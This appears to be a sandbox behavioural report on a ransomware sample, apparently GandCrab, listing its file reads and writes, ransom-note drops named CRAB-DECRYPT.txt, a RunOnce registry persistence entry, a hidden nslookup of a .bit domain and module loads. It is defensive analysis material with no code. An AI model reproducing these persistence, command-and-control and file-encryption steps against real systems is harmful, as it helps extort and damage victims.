Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox size = 1048576, size_out = 16806 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox size = 1048576, size_out = 11380 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox size = 1048576, size_out = 6024 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox size = 1048576, size_out = 9191 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox size = 1048576, size_out = 4326 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox size = 1048576, size_out = 7370 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox size = 1048576, size_out = 5596 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox size = 1048576, size_out = 3683 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox size = 1048576, size_out = 4888 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox size = 1048576, size_out = 6448 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox size = 1048576, size_out = 5630 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox size = 1048576, size_out = 6193 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox size = 1048576, size_out = 3075 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox size = 1048576, size_out = 5151 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl size = 1048576, size_out = 333258 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl size = 1048576, size_out = 296658 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl size = 1048576, size_out = 268317 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl size = 1048576, size_out = 255948 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl size = 1048576, size_out = 251032 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl size = 1048576, size_out = 284415 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl size = 1048576, size_out = 294178 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl size = 1048576, size_out = 270198 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl size = 1048576, size_out = 217137 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl size = 1048576, size_out = 254875 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl size = 1048576, size_out = 344303 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl size = 1048576, size_out = 250983 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx size = 1048576, size_out = 51826 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835231[[fn=Text Cover with TOC (Student Report Blue design)]].docx size = 1048576, size_out = 61649 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835232[[fn=Text Cover (Student Report Blue design)]].docx size = 1048576, size_out = 58010 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx size = 1048576, size_out = 47296 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835264[[fn=Cover Page (Annual Report Red and Black design)]].docx size = 1048576, size_out = 59085 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835265[[fn=Cover Page (Annual Report Timeless design)]].docx size = 1048576, size_out = 58498 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835266[[fn=Cover Letter (Chronological Resume Simple design)]].docx size = 1048576, size_out = 56927 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835267[[fn=Cover with Logo (Annual Report Red and Black design)]].docx size = 1048576, size_out = 63388 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835268[[fn=Photo Cover (Student Report Blue design)]].docx size = 1048576, size_out = 321660 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835269[[fn=Photo Cover with TOC (Student Report blue design)]].docx size = 1048576, size_out = 314136 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835270[[fn=Photo Sidebar (Annual Report Red and Black design)]].docx size = 1048576, size_out = 231239 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835271[[fn=Sample Table (Annual Report Red and Black design)]].docx size = 1048576, size_out = 29601 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835272[[fn=Sample Table (Annual Report Timeless design)]].docx size = 1048576, size_out = 45413 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02836362[[fn=Cover letter (Resume Timeless Design)]].docx size = 1048576, size_out = 50977 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx size = 1048576, size_out = 34415 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx size = 1048576, size_out = 1048576 True 3
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx size = 1048576, size_out = 319348 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Normal.dotm size = 1048576, size_out = 19050 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Welcome to Word.dotx size = 1048576, size_out = 1048576 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Welcome to Word.dotx size = 1048576, size_out = 147357 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC size = 1048576, size_out = 22 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addons.json size = 1048576, size_out = 24 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addonStartup.json.lz4 size = 1048576, size_out = 655 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\blocklist.xml size = 1048576, size_out = 278205 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cert8.db size = 1048576, size_out = 65536 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\compatibility.ini size = 1048576, size_out = 199 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\containers.json size = 1048576, size_out = 809 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\content-prefs.sqlite size = 1048576, size_out = 229376 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cookies.sqlite size = 1048576, size_out = 524288 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651440860.2d520ad0-8005-4317-b4fd-571af846ed8d.new-profile.jsonlz4 size = 1048576, size_out = 2931 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651441015.321b9820-ddf0-4472-8833-27c2104c93fa.main.jsonlz4 size = 1048576, size_out = 6296 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651456011.5f95b583-d699-497d-975d-4dba64e21259.main.jsonlz4 size = 1048576, size_out = 5884 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\session-state.json size = 1048576, size_out = 161 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\state.json size = 1048576, size_out = 51 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\extensions.json size = 1048576, size_out = 10542 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\favicons.sqlite size = 1048576, size_out = 1048576 True 5
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\favicons.sqlite size = 1048576, size_out = 0 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\1.6\gmpopenh264.info size = 1048576, size_out = 116 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt size = 1048576, size_out = 479 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\manifest.json size = 1048576, size_out = 348 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib size = 1048576, size_out = 2456 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\handlers.json size = 1048576, size_out = 683 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\key3.db size = 1048576, size_out = 16384 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\permissions.sqlite size = 1048576, size_out = 98304 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite size = 1048576, size_out = 1048576 True 2
Write C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP size = 160 True 1
Write C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP size = 256 True 2
Write C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP size = 16 True 1
Write C:\Users\Nd9E1FYi\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif size = 2544 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc size = 76544 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav size = 27792 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp size = 94400 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3 size = 2048 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3 size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3 size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif size = 34336 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png size = 31408 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Collab\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Forms\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\JSCache\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata size = 7872 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl size = 640 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl size = 432 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\AssetCache\EYGUEQKQ\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\NativeCache\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy size = 23376 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg size = 224 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml size = 18768 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3 size = 51504 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3 size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3 size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3 size = 38976 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3 size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3 size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4 size = 89232 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4 size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4 size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots size = 99536 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4 size = 29760 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4 size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4 size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt size = 86608 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv size = 89248 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi size = 52416 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi size = 16 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf size = 100304 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf size = 256 True 2
Write C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt size = 3704 True 1
Write C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt size = 3704 True 1
For performance reasons, the remaining 483 entries are omitted.
The remaining entries can be found in glog.xml.
Registry (28)
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce value_name = yczsdfarmlf, data = "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe", size = 88, type = REG_SZ True 1
Process (1)
Operation Process Additional Information Success Count Logfile
Create nslookup politiaromana.bit ns1.virmach.ru os_pid = 0xb74, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Module (1131)
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x75bf0000 True 3
Load KERNEL32.dll base_address = 0x75bf0000 True 2
Load msvcr100.dll base_address = 0x70350000 True 1
Load USER32.dll base_address = 0x76110000 True 1
Load GDI32.dll base_address = 0x76710000 True 1
Load ADVAPI32.dll base_address = 0x76310000 True 1
Load SHELL32.dll base_address = 0x74240000 True 1
Load CRYPT32.dll base_address = 0x76860000 True 1
Load WININET.dll base_address = 0x6fb50000 True 1
Load PSAPI.DLL base_address = 0x75640000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75bf0000 True 12
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77080000 True 5
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x76310000 True 426
Get Filename - process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 260 True 2
Get Filename - process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 256 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75c0a980 True 2
